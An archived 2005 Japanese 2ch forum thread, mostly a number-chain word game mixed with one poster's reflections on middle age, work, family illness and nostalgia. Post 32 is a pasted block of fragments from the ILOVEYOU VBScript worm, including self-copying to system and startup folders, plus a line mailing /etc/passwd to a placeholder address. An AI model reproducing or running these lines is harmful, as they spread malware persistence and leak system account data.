2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ウソから出たマコト

1 :名無しさん@お腹いっぱい。:2005/04/30(土) 22:46:13
スパゲッティーが・・・。



2 :名無しさん@お腹いっぱい。:2005/04/30(土) 22:47:26
お皿



3 :名無しさん@お腹いっぱい。:2005/04/30(土) 22:51:01
三笠山

4 :名無しさん@お腹いっぱい。:2005/04/30(土) 22:55:35
四天王

5 :名無しさん@お腹いっぱい。:2005/04/30(土) 23:01:46
五臓六腑

6 :名無しさん@お腹いっぱい。:2005/04/30(土) 23:03:45
六本木

7 :名無しさん@お腹いっぱい。:2005/04/30(土) 23:35:31
七年目の浮気

8 :名無しさん@お腹いっぱい。:2005/04/30(土) 23:37:57
八十八夜

9 :名無しさん@お腹いっぱい。:2005/04/30(土) 23:40:06
九十九里

10 :名無しさん@お腹いっぱい。:2005/04/30(土) 23:44:09
十戒

11 :名無しさん@お腹いっぱい。:2005/04/30(土) 23:46:43
赤き血のイレブン

12 :名無しさん@お腹いっぱい。:2005/04/30(土) 23:48:13
十二単

13 :名無しさん@お腹いっぱい。:2005/04/30(土) 23:55:07
13日の金曜日

14 :名無しさん@お腹いっぱい。:2005/05/01(日) 00:05:12
お前ら、偉大なる・・・・・

14

15 :名無しさん@お腹いっぱい。:2005/05/01(日) 00:10:31
愛人を・・・・

15

16 :名無しさん@お腹いっぱい。:2005/05/01(日) 22:43:29
十六夜日記

17 :名無しさん@お腹いっぱい。:2005/05/02(月) 11:47:07
Seventeen

18 :名無しさん@お腹いっぱい。:2005/05/02(月) 17:06:36
若作りのおばさんって・・・・

18

19 :名無しさん@お腹いっぱい。:2005/05/02(月) 17:31:09
19の春

20 :名無しさん@お腹いっぱい。:2005/05/02(月) 17:33:18
「ぐぅわし!」

21 :名無しさん@お腹いっぱい。:2005/05/02(月) 17:52:08
ウソから出たマコト・・・・

21

22 :名無しさん@お腹いっぱい。:2005/05/02(月) 17:53:31
ぞろ目の

22

23 :名無しさん@お腹いっぱい。:2005/05/02(月) 18:34:09
実は妻に・・・・・

23

24 :名無しさん@お腹いっぱい。:2005/05/02(月) 18:41:45
@@映画好き・・・・

24

25 :名無しさん@お腹いっぱい。:2005/05/02(月) 19:54:08
青春のポップス・・・

25



26 :名無しさん@お腹いっぱい。:2005/05/02(月) 23:05:23
昭和40年代が・・・

26

27 :名無しさん@お腹いっぱい。:2005/05/02(月) 23:58:41
40代の阪神ファン・・・

27

28 :名無しさん@お腹いっぱい。:2005/05/03(火) 10:01:33
【巳】昭和40年4月2日〜・・・

28

29 :名無しさん@お腹いっぱい。:2005/05/03(火) 12:32:25
全然おもしろくない・・・・

29

毎日が続く。
体調不良が続いて今日も仕事を休みました。

30 :名無しさん@お腹いっぱい。:2005/05/03(火) 20:10:51
言いたいことだけ言って・・・

30

去る、なんて卑怯だと思うし、許さない!

31 :ソープ ◆zggzfyKci. :2005/05/04(水) 00:27:38
最後に「笑わせるなよ!?」・・・

31

ってね、笑わせたのはあんたじゃない、コーヒー噴出した。

32 :名無しさん@お腹いっぱい。:2005/05/04(水) 02:19:53
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"



33 :ソープ ◆zggzfyKci. :2005/05/04(水) 10:42:55
小中学生の頃に着ていた洋服は・・・・・

33

母親の手作り。
わりと器用な母で自慢だった。

34 :名無しさん@お腹いっぱい。:2005/05/04(水) 20:56:07
ミシシッピー
(34)



35 :ソープ ◆zggzfyKci. :2005/05/04(水) 21:29:28
人殺したい衝動って・・・・・・

35

わからなくもない。わかこ。

36 :ソープ ◆zggzfyKci. :2005/05/05(木) 00:05:31
40代の男の・・・

36

心理はわからない。
まわりはみんな、50過ぎ。

37 :名無しさん@お腹いっぱい。:2005/05/05(木) 13:07:10
あのころの

37に

戻っても、結局同じ人生か?

38 :名無しさん@お腹いっぱい。:2005/05/05(木) 20:35:59
連休も今日で終わり

38





39 :ソープ ◆zggzfyKci. :2005/05/06(金) 02:15:07
・・・・・パチンコ・・・

39

かじっただけ。

40 :ソープ ◆zggzfyKci. :2005/05/06(金) 16:50:51
両親が老いてゆく・・・・・

40

のは、避けられない。
しかし、姑の状態のほうが今は、心配。

41 :名無しさん@お腹いっぱい。:2005/05/07(土) 23:15:15
41

・・・・・・・・

42 :名無しさん@お腹いっぱい。:2005/05/08(日) 21:49:52
42

43 :ソープ ◆zggzfyKci. :2005/05/09(月) 01:20:58
俺たちにはもう恋愛・・・・

43

できないのか?・・
少なくともワタクシメはできると、思うけど。
でも、この年齢になると
簡単ではすまされないいろいろな問題を、抱えてのことだと思う。
すべて、クリアーにできるには、根性、時間がとても、必要。



44 :ソープ ◆zggzfyKci. :2005/05/09(月) 23:02:06
そろそろ禁煙・・・・・・

44

などと、20年前に思ってやめたことがあるけど
1ヶ月に4キロ太り
こりゃ、だめだ、と禁煙は断念いたしました。

45 :名無しさん@お腹いっぱい。:2005/05/09(月) 23:34:46
タバコは体に良くない

45


分かっているけど止められない^^;

46 :ソープ ◆zggzfyKci. :2005/05/11(水) 02:55:08
TV40代が今・・・・・


46

若い頃は興味がなかった大河ドラマにはまってしまっている・・・・。
なぜか、今頃になって、その関係の書物までも読みあさっている始末。
少しは、アタマ使ってボケ防止にもなるような気がして
励んでいます

47 :名無しさん@お腹いっぱい。:2005/05/11(水) 22:30:35
47



48 :ソープ ◆zggzfyKci. :2005/05/11(水) 23:56:55
結婚しないことは・・・・・


48

親不孝、とは思わないが
老後を考えると、伴侶(結婚してなくても、いいか〜)は必要だと思う。
お互い励ましあう光景を、仕事がらよく見かけるが
自分も、あのようになれればいい・・、と、ここ数年は思っている。


49 :名無しさん@お腹いっぱい。:2005/05/12(木) 22:23:12
49


50 :ソープ ◆zggzfyKci. :2005/05/13(金) 04:18:32
霊安室・・・・・

50

この年まで一度も入室したことが、ない。
経験不足か?!

51 :名無しさん@お腹いっぱい。:2005/05/13(金) 21:37:36
普通はないと思うが・・・

51

52 :ソープ ◆zggzfyKci. :2005/05/14(土) 08:55:09
激しく会話・・・・・


52

をする機会がだんだん薄れていく。
波風立てないように、というより
疲れるんだな〜。
「まっ・・・いいか」なんてね。

53 :名無しさん@お腹いっぱい。:2005/05/14(土) 21:22:20
話し相手がいない・・・

53

54 :ソープ ◆zggzfyKci. :2005/05/14(土) 22:50:40
言いたい事だけ言って・・・・


54

デジャ・ブ

55 :名無しさん@お腹いっぱい。:2005/05/14(土) 23:24:55
ドリームジャンボ

55

あさってから発売だじょ

56 :名無しさん@お腹いっぱい。:2005/05/14(土) 23:46:37
宝くじか〜 10年以上買ってないなぁ〜
夢が持てない・・・

56

57 :名無しさん@お腹いっぱい。:2005/05/15(日) 13:36:37
1

58 :ソープ ◆zggzfyKci. :2005/05/15(日) 21:14:29
40代からの転職・・・・・・

58

でしたよ、わたし。
あげくに、40代で、普通普通自動二輪も取っちゃったりして。
さらに、普通二種までも・・・。
その年は
免許更新→普通自動二輪→普通二種と
免許3回、作り直しました。

59 :名無しさん@お腹いっぱい。:2005/05/16(月) 22:17:02
59


60 :ソープ ◆zggzfyKci. :2005/05/17(火) 02:33:00
40代版次の人が・・・・・・

60

見つかるまで、つなげたいけど難しい。

61 :ソープ ◆zggzfyKci. :2005/05/17(火) 18:12:55
昭和38年4月・・・・・・


61


この年だったのか記憶は定かではないのだが
東京多摩地区に4月17日に雪が降りました。
さだかではありませんが4月17日は間違いない。

62 :名無しさん@お腹いっぱい。:2005/05/17(火) 23:51:51
62

63 :ソープ ◆zggzfyKci. :2005/05/19(木) 01:55:20
漢字二文字言葉の

63

伝わり方は難しい・・。

愛人と恋人の定義は・・・・?
時に、愛人
時に、恋人
受ける側、伝える側で、ご都合主義ですか?

64 :ソープ ◆zggzfyKci. :2005/05/19(木) 23:41:05
ジャニーズ・・・・


64

フォーリーブスしか、わからん。
義経ちゃんもそうだったっけ?!

65 :ソープ ◆zggzfyKci. :2005/05/22(日) 21:18:26
日曜の夜って・・・・

65

静か。
公立の学校が土曜も休みになってから
ずいぶん静かになりました。

66 :ソープ ◆zggzfyKci. :2005/05/24(火) 04:13:50
果てしない連鎖ゲーム

66


年齢幅がひろいから面白いや。

67 :ソープ ◆zggzfyKci. :2005/05/24(火) 23:39:38
フォークソング・・・・・

67

高石、岡林。
特に今でも強烈に頭に残るのは
チューリップのアップリケ。
たいして大人でもなかったけれど強烈だった。
どこかで手紙、などの話題も上がっていて
思わず、CD購入。



68 :名無しさん@お腹いっぱい。:2005/05/27(金) 23:38:46
68

うちがなんぼ早よ 起きても
おとうちゃんはもう 靴とんとん たたいてはる♪


69 :ソープ ◆zggzfyKci. :2005/05/28(土) 12:52:52
天気の様子・・・


69

は曇り。


70 :名無しさん@お腹いっぱい。:2005/05/29(日) 14:49:51
70


71 :名無しさん@お腹いっぱい。:2005/05/29(日) 21:31:13
71

72 :ソープ ◆zggzfyKci. :2005/05/29(日) 22:18:46
今年こそは・・・・


72

と思いつつできないこと・・・
身辺整理。
いつ入院しても
いつ死んでも
いいように、身の回りの整理しておきたい。
今年は、秋までにはしておこう!

いろいろやばい年齢です。

73 :ソープ ◆zggzfyKci. :2005/06/01(水) 03:12:24
もう仕事したくねえんだけど・・・・


73


石の上にも三年、と思いつつ10年になろうとしている。
仕事したくもないけれど
諸事情が許さない因果な人生を送っています。

74 :名無しさん@お腹いっぱい。:2005/06/01(水) 22:39:35
74

75 :名無しさん@お腹いっぱい。:2005/06/02(木) 23:22:06
75

76 :名無しさん@お腹いっぱい。:2005/06/03(金) 22:28:56
76

77 :ソープ ◆zggzfyKci. :2005/06/04(土) 00:15:31
当たり前のこと・・・・


77

だと思うけど、ソラさんだよね?!
途中、途中ありがとです。

78 : ◆SORA..6cyg :2005/06/05(日) 00:01:57
どうもです。

78

79 :ソープ ◆zggzfyKci. :2005/06/05(日) 02:29:35
40代のオバサンから見て・・・

79


ぎゃるちゃんたちのなせる行動がなんともあきれてしまう。
コンビニのごみ、ぽい。
ちゃりんこのUけつ。
将来が不安だ・・・・。






80 :ソープ ◆zggzfyKci. :2005/06/05(日) 02:32:59
ちょっと・・・・


80

思いついたことを、書きなぐっているだけ。
よろしく。

81 :名無しさん@お腹いっぱい。:2005/06/05(日) 21:30:51
体にガタがきた・・・

81

頭はガタガタです

82 :ソープ ◆zggzfyKci. :2005/06/05(日) 22:33:32
一人寝は寂しい・・・・


82

というより、寒い!
足が冷えます。
夏でも靴下はかなきゃならんので冬は最悪。
末端の血管に血が通っていない。

83 :ソープ ◆zggzfyKci. :2005/06/06(月) 21:53:40
17〜20時あたり・・・

83

普通は忙しい。
しかし、いまの仕事は暇だ。
だから、その時間帯に食事を取ることが多い。



84 :ソープ ◆zggzfyKci. :2005/06/07(火) 00:45:01
へたれ悦司・・・・


84

と、話題(wになっているようだが
個人的には
へたれ宏!と叫びたい。
アマリリスの花は咲きそうです・・・。


85 :名無しさん@お腹いっぱい。:2005/06/07(火) 22:47:15
宏って誰・・・?

みんなで 聞こう 楽しい オルゴールを
 ラリラリラリラ〜 しらべは アマリリス♪

85


86 :ソープ ◆zggzfyKci. :2005/06/10(金) 03:19:25
いまだに・・・・・

86

引きずっているもの。
親に対する馬鹿みたいなうらみ。
あの時、親の言うことに反抗して公立の共学に行かず
私立女子高に行っていれば
私の人生、ずいぶん今とは変わっていたと思う。
今の人生、わるくもないが・・・。
私立に行っていればうわさの宏とも決してかかわることなくきたものなのに。

宏(ひろし) A型 申年 アル中 60過ぎたジジイですねん。

  

87 :ソープ ◆zggzfyKci. :2005/06/12(日) 02:03:30
The憲法・・・


87



暇なので検索かけてみた(w

予備費、だそうで。
我が家の予備費は姑の入院で底をついている。
なのに昨夜、大たい骨骨折で、緊急入院!!
不足分に当てるお金ははもう・・・・・ない・・・・・・。

Help Me!



88 :名無しさん@お腹いっぱい。:2005/06/12(日) 14:40:19
ここは特定の方のスレですか?

89 :ソープ ◆zggzfyKci. :2005/06/12(日) 14:49:59
うちのワンコが・・・・

89

年取りました。

>>88
なこと、ないでしょう〜

90 :ソープ ◆zggzfyKci. :2005/06/13(月) 01:01:24
死んだら・・・・

90

使えるものは使ってください、と思い
臓器提供意思表示カードは携帯してます。
平成10年に家族からの署名も記載。
しかしあれから7年。
まともなものはあるのだろうか?!

91 :名無しさん@お腹いっぱい。:2005/06/13(月) 21:59:53
死んだら・・・・

91

墓は要らないので、海に散骨してください。





92 :ソープ ◆zggzfyKci. :2005/06/13(月) 23:35:22
失業・・・!

92

お願いだからあと、3ヶ月。
ローンの支払いが終わるまで。

93 :ソープ ◆zggzfyKci. :2005/06/16(木) 03:01:24
2chで見つけた・・・

93

いま興味あるスレは
乗馬馬術。
友人の29歳の娘がつぶやいた・・・・。
ひそかにブーム、だと。
そうなんですか?
知ってる人、居ます??


94 :名無しさん@お腹いっぱい。:2005/06/16(木) 21:49:49
乗馬? 無縁です。

94

私が知っていたら、
ひそかなブームではありません。

95 :ソープ ◆zggzfyKci. :2005/06/18(土) 21:58:56
☆★☆・・・

95

ここ数年、目の前(?)を銀色の光が右から左へ飛びます。
時々だけれどすごくきれいです。
更年期、でしょうか?
ほんとにきれいな☆〜。

96 :ソープ ◆zggzfyKci. :2005/06/20(月) 22:09:33
死んだら・・・

96

デジャブー

私の誕生日の日に祖母がガンで亡くなりました。
もう40年以上前のこと。
それから、わたしはいつも感じています。
後ろにいつも祖母が居てくれてる、って。
祖母の娘(私の母)は霊感が昔あったけれど
そのわたしの背後の祖母の存在は気づいていません。
ふふ〜♪

16 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)